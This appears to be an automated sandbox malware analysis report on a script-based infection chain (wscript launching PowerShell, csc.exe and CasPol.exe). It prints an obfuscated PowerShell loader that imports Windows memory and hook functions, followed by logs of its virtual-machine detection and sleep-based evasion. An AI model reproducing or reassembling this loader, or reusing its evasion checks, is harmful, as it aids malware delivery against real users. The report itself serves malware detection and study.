desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_1DB3D832 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E394B push 8BFFFFFFh; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E3622 push ebp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dllJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
          Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFunction Chain: memAlloc,threadCreated,memAlloc,memAlloc,threadResumed,threadDelayed,processSet,memAlloc,processSet,memAlloc,memAlloc,memAlloc,threadDelayed,processSet,memAlloc,memAlloc,threadDelayed,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed
          Source: Initial fileInitial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944Thread sleep count: 235 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944Thread sleep time: -7050000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8736
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeThread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: ModuleInformation
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM~
          Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VScx
          Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 10_2_209E9980 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skolegaardene = """reabedsaddi-fitgeysjpsyean de-chtheytepaneladreeopfprinonmiiprtsainooscnka da'kourisfoiudnmygsy sysimyinsofttretumok;suustsnyisunbigdr trsmiyassdatdeeprmti.dormiumansotcoigamduebi.boiannsotpheoprinoudptesdeeomrgovstiknctredesfo;oppsiupabfolvaiafcgl elsshtfiabathvicocot dacunlryadzsspsor sirchepraudbstrgiisidadgpaenodat1ch in{cr[fjddrladlsqihemtapkoobervatde(ne`"""sowowihansamblmba.dedsalbalin`"""bi)sg]koppeuasbfolunihocmy prsgrtunasetinistcsi haenexsktbreporfenge uniunnartma homcaimbdsaisuotjulgtnoozipfoejrnxs(smiornbutbr pokprvabatalmoibe,tiigansatth brkatovinte,zailunditad korruiovnpegsaeatdth,rribantrtde spuounpywfoohe,hoiknngetha kouwidgrere)co;as[mudtulallreithmnopblobrrfitne(ud`"""sekuneserobnomebilhl3up2te`"""he)av]riparufuboclfiicucma assemtsaadrtapifrctu raestxditkievermenpr jiifanovtlo arlmoopecviaaulprsunhcarpoihunsvkde(ouiunnhitst resdycpuounrtupgribr,whivendotst stnsasfikovematimnup)eu;fg[gudhylanlfuipemafpleowirmutra(kh`"""vekbieemradnpueanlnl3ek2bl`"""sp)pe]repgeurebprlreiracst desbettaamatfiifocom shefaxpitdieunrtanko blisunkatke scsarecatancudomombomsisditcaazatamere(unismnextse cokcuobefaltsmaaf,naiafnlatsu scslatkaohorhortrybu)sk;kr[lidstlimlcuihomekptaorkrbrtsh(pu`"""pskfeeskrannopeunlbi3sp2ut`"""va)gr]goporupabovlupishcsu vesbetlaaistptisncen puebuxagtcoeunrcanue alimonvetce trhleesaaslpjacdyrsiediaafttiedr(iligrnudten scndoedocwirhiosapbe,biivonsitdo 